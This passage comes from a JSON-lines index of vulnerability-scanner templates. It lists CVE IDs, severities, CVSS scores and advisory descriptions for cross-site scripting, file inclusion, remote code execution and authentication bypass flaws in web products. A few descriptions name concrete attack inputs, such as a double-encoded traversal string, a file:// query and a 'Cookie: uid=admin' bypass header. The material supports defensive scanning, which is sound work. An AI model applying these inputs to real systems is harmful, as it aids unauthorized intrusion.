defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-18608.yaml"} +{"ID":"CVE-2018-18775","Info":{"Name":"Microstrategy Web 7 - Cross-Site Scripting","Severity":"medium","Description":"Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-18775.yaml"} +{"ID":"CVE-2018-18777","Info":{"Name":"Microstrategy Web 7 - Local File Inclusion","Severity":"medium","Description":"Microstrategy Web 7 is vulnerable to local file inclusion via \"/WebMstr7/servlet/mstrWeb\" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2018/CVE-2018-18777.yaml"} +{"ID":"CVE-2018-18778","Info":{"Name":"ACME mini_httpd \u003c1.30 - Local File Inclusion","Severity":"medium","Description":"ACME mini_httpd before 1.30 is vulnerable to local file inclusion.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2018/CVE-2018-18778.yaml"} +{"ID":"CVE-2018-18925","Info":{"Name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","Severity":"critical","Description":"Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a \"..\" session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-18925.yaml"} +{"ID":"CVE-2018-19136","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-19136.yaml"} +{"ID":"CVE-2018-19137","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-19137.yaml"} +{"ID":"CVE-2018-19287","Info":{"Name":"WordPress Ninja Forms \u003c3.3.18 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-19287.yaml"} +{"ID":"CVE-2018-19326","Info":{"Name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","Severity":"high","Description":"Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing \"dot dot\" sequences (/../), conduct directory traversal attacks, and view arbitrary files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-19326.yaml"} +{"ID":"CVE-2018-19365","Info":{"Name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","Severity":"high","Description":"Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-19365.yaml"} +{"ID":"CVE-2018-19386","Info":{"Name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","Severity":"medium","Description":"SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-19386.yaml"} +{"ID":"CVE-2018-19439","Info":{"Name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","Severity":"medium","Description":"Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-19439.yaml"} +{"ID":"CVE-2018-19458","Info":{"Name":"PHP Proxy 3.0.3 - Local File Inclusion","Severity":"high","Description":"PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-19458.yaml"} +{"ID":"CVE-2018-19749","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2018/CVE-2018-19749.yaml"} +{"ID":"CVE-2018-19751","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description \u0026 Notes field parameters.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2018/CVE-2018-19751.yaml"} +{"ID":"CVE-2018-19752","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2018/CVE-2018-19752.yaml"} +{"ID":"CVE-2018-19753","Info":{"Name":"Tarantella Enterprise \u003c3.11 - Local File Inclusion","Severity":"high","Description":"Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-19753.yaml"} +{"ID":"CVE-2018-19877","Info":{"Name":"Adiscon LogAnalyzer \u003c4.1.7 - Cross-Site Scripting","Severity":"medium","Description":"Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-19877.yaml"} +{"ID":"CVE-2018-19892","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2018/CVE-2018-19892.yaml"} +{"ID":"CVE-2018-19914","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2018/CVE-2018-19914.yaml"} +{"ID":"CVE-2018-19915","Info":{"Name":"DomainMOD \u003c=4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2018/CVE-2018-19915.yaml"} +{"ID":"CVE-2018-20009","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2018/CVE-2018-20009.yaml"} +{"ID":"CVE-2018-20010","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2018/CVE-2018-20010.yaml"} +{"ID":"CVE-2018-20011","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2018/CVE-2018-20011.yaml"} +{"ID":"CVE-2018-20462","Info":{"Name":"WordPress JSmol2WP \u003c=1.07 - Cross-Site Scripting","Severity":"medium","Description":"WordPress JSmol2WP version 1.07 and earlier is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-20462.yaml"} +{"ID":"CVE-2018-20463","Info":{"Name":"JSmol2WP \u003c= 1.07 - Directory Traversal","Severity":"high","Description":"An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-20463.yaml"} +{"ID":"CVE-2018-20470","Info":{"Name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","Severity":"high","Description":"Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-20470.yaml"} +{"ID":"CVE-2018-20526","Info":{"Name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","Severity":"critical","Description":"Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-20526.yaml"} +{"ID":"CVE-2018-20824","Info":{"Name":"Atlassian Jira WallboardServlet \u003c7.13.1 - Cross-Site Scripting","Severity":"medium","Description":"The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-20824.yaml"} +{"ID":"CVE-2018-20985","Info":{"Name":"WordPress Payeezy Pay \u003c=2.97 - Local File Inclusion","Severity":"critical","Description":"WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-20985.yaml"} +{"ID":"CVE-2018-2392","Info":{"Name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","Severity":"high","Description":"SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-2392.yaml"} +{"ID":"CVE-2018-2628","Info":{"Name":"Oracle WebLogic Server Deserialization - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-2628.yaml"} +{"ID":"CVE-2018-2791","Info":{"Name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","Severity":"high","Description":"The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data.","Classification":{"CVSSScore":"8.2"}},"file_path":"cves/2018/CVE-2018-2791.yaml"} +{"ID":"CVE-2018-2893","Info":{"Name":"Oracle WebLogic Server - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-2893.yaml"} +{"ID":"CVE-2018-2894","Info":{"Name":"Oracle WebLogic Server - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services) is susceptible to a remote code execution vulnerability that is easily exploitable and could allow unauthenticated attackers with network access via HTTP to compromise the server. Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-2894.yaml"} +{"ID":"CVE-2018-3167","Info":{"Name":"Unauthenticated Blind SSRF in Oracle EBS","Severity":"medium","Description":"https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-3167.yaml"} +{"ID":"CVE-2018-3238","Info":{"Name":"Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting","Severity":"medium","Description":"The Oracle WebCenter Sites 11.1.1.8.0 component of Oracle Fusion Middleware is impacted by easily exploitable cross-site scripting vulnerabilities that allow high privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites.","Classification":{"CVSSScore":"6.9"}},"file_path":"cves/2018/CVE-2018-3238.yaml"} +{"ID":"CVE-2018-3714","Info":{"Name":"node-srv - Local File Inclusion","Severity":"medium","Description":"node-srv is vulnerable to local file inclusion due to lack of url validation, which allows a malicious user to read content of any file with known path.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2018/CVE-2018-3714.yaml"} +{"ID":"CVE-2018-3760","Info":{"Name":"Ruby On Rails - Local File Inclusion","Severity":"high","Description":"Ruby On Rails is vulnerable to local file inclusion caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-3760.yaml"} +{"ID":"CVE-2018-3810","Info":{"Name":"Oturia WordPress Smart Google Code Inserter \u003c3.5 - Authentication Bypass","Severity":"critical","Description":"Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-3810.yaml"} +{"ID":"CVE-2018-5230","Info":{"Name":"Atlassian Jira Confluence - Cross-Site Scripting","Severity":"medium","Description":"Atlassian Jira Confluence before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4, and from version 7.9.0 before version 7.9.2, allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the error message of custom fields when an invalid value is specified.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-5230.yaml"} +{"ID":"CVE-2018-5233","Info":{"Name":"Grav CMS \u003c1.3.0 - Cross-Site Scripting","Severity":"medium","Description":"Grav CMS before 1.3.0 is vulnerable to cross-site scripting via system/src/Grav/Common/Twig/Twig.php and allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-5233.yaml"} +{"ID":"CVE-2018-5316","Info":{"Name":"WordPress SagePay Server Gateway for WooCommerce \u003c1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress SagePay Server Gateway for WooCommerce before 1.0.9 is vulnerable to cross-site scripting via the includes/pages/redirect.php page parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-5316.yaml"} +{"ID":"CVE-2018-5715","Info":{"Name":"SugarCRM 3.5.1 - Cross-Site Scripting","Severity":"medium","Description":"SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable).","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-5715.yaml"} +{"ID":"CVE-2018-6008","Info":{"Name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","Severity":"high","Description":"Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-6008.yaml"} +{"ID":"CVE-2018-6200","Info":{"Name":"vBulletin - Open Redirect","Severity":"medium","Description":"vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-6200.yaml"} +{"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-6910.yaml"} +{"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-7251.yaml"} +{"ID":"CVE-2018-7422","Info":{"Name":"WordPress Site Editor \u003c=1.1.1 - Local File Inclusion","Severity":"high","Description":"WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-7422.yaml"} +{"ID":"CVE-2018-7467","Info":{"Name":"AxxonSoft Axxon Next - Local File Inclusion","Severity":"high","Description":"AxxonSoft Axxon Next suffers from a local file inclusion vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-7467.yaml"} +{"ID":"CVE-2018-7490","Info":{"Name":"uWSGI PHP Plugin Local File Inclusion","Severity":"high","Description":"uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-7490.yaml"} +{"ID":"CVE-2018-7600","Info":{"Name":"Drupal - Remote Code Execution","Severity":"critical","Description":"Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-7600.yaml"} +{"ID":"CVE-2018-7602","Info":{"Name":"Drupal - Remote Code Execution","Severity":"critical","Description":"Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-7602.yaml"} +{"ID":"CVE-2018-7662","Info":{"Name":"CouchCMS \u003c= 2.0 - Path Disclosure","Severity":"medium","Description":"CouchCMS \u003c= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-7662.yaml"} +{"ID":"CVE-2018-7700","Info":{"Name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","Severity":"high","Description":"DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2018/CVE-2018-7700.yaml"} +{"ID":"CVE-2018-7719","Info":{"Name":"Acrolinx Server \u003c5.2.5 - Local File Inclusion","Severity":"high","Description":"Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-7719.yaml"} +{"ID":"CVE-2018-8006","Info":{"Name":"Apache ActiveMQ \u003c=5.15.5 - Cross-Site Scripting","Severity":"medium","Description":"Apache ActiveMQ versions 5.0.0 to 5.15.5 are vulnerable to cross-site scripting via the web based administration console on the queue.jsp page. The root cause of this issue is improper data filtering of the QueueFilter parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-8006.yaml"} +{"ID":"CVE-2018-8033","Info":{"Name":"Apache OFBiz 16.11.04 - XML Entity Injection","Severity":"high","Description":"Apache OFBiz 16.11.04 is susceptible to XML external entity injection (XXE injection).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-8033.yaml"} +{"ID":"CVE-2018-8715","Info":{"Name":"AppWeb Authentication Bypass vulnerability","Severity":"high","Description":"The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2018/CVE-2018-8715.yaml"} +{"ID":"CVE-2018-8719","Info":{"Name":"WordPress Plugin WP Security Audit Log 3.1.1 - Information Disclosure","Severity":"medium","Description":"Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find sensitive information","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-8719.yaml"} +{"ID":"CVE-2018-8727","Info":{"Name":"Mirasys DVMS Workstation \u003c=5.12.6 - Local File Inclusion","Severity":"high","Description":"Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-8727.yaml"} +{"ID":"CVE-2018-8770","Info":{"Name":"Cobub Razor 0.8.0 Physical path Leakage Vulnerability","Severity":"medium","Description":"Physical path Leakage exists in Western Bridge Cobub Razor 0.8.0 via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php in tests/.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-8770.yaml"} +{"ID":"CVE-2018-9118","Info":{"Name":"WordPress 99 Robots WP Background Takeover Advertisements \u003c=4.1.4 - Local File Inclusion","Severity":"high","Description":"WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-9118.yaml"} +{"ID":"CVE-2018-9161","Info":{"Name":"PrismaWEB - Credentials Disclosure","Severity":"critical","Description":"PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-9161.yaml"} +{"ID":"CVE-2018-9205","Info":{"Name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","Severity":"high","Description":"In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-9205.yaml"} +{"ID":"CVE-2018-9845","Info":{"Name":"Etherpad Lite \u003c1.6.4 - Admin Authentication Bypass","Severity":"critical","Description":"Etherpad Lite before 1.6.4 is exploitable for admin access.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-9845.yaml"} +{"ID":"CVE-2018-9995","Info":{"Name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","Severity":"critical","Description":"TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and\nMDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass\nauthentication via a \"Cookie: uid=admin\" header, as demonstrated by a device.rsp?opt=user\u0026cmd=list request that provides credentials within JSON data in a response.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-9995.yaml"} +{"ID":"CVE-2019-0193","Info":{"Name":"Apache Solr DataImportHandler \u003c8.2.0 - Remote Code Execution","Severity":"high","Description":"Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request's \"dataConfig\" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2019/CVE-2019-0193.yaml"} +{"ID":"CVE-2019-0221","Info":{"Name":"Apache Tomcat - Cross-Site Scripting","Severity":"medium","Description":"Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-0221.yaml"} +{"ID":"CVE-2019-0230","Info":{"Name":"Apache Struts \u003c=2.5.20 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-0230.yaml"} +{"ID":"CVE-2019-10068","Info":{"Name":"Kentico CMS Insecure Deserialization Remote Code Execution","Severity":"critical","Description":"Kentico CMS is susceptible to remote code execution via a .NET deserialization vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-10068.yaml"} +{"ID":"CVE-2019-10092","Info":{"Name":"Apache HTTP Server \u003c=2.4.39 - HTML Injection/Partial Cross-Site Scripting","Severity":"medium","Description":"Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-10092.yaml"} +{"ID":"CVE-2019-1010287","Info":{"Name":"Timesheet Next Gen \u003c=1.5.3 - Cross-Site Scripting","Severity":"medium","Description":"Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-1010287.yaml"} +{"ID":"CVE-2019-1010290","Info":{"Name":"Babel - Open Redirect","Severity":"medium","Description":"Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-1010290.yaml"} +{"ID":"CVE-2019-10232","Info":{"Name":"Teclib GLPI \u003c= 9.3.3 - Unauthenticated SQL Injection","Severity":"critical","Description":"Teclib GLPI \u003c= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-10232.yaml"} +{"ID":"CVE-2019-10405","Info":{"Name":"Diagnostic page exposed Cookie HTTP header","Severity":"medium","Description":"Jenkins 2.196 and earlier, LTS 2.176.3 and earlier printed the value of the Cookie on the /whoAmI/ 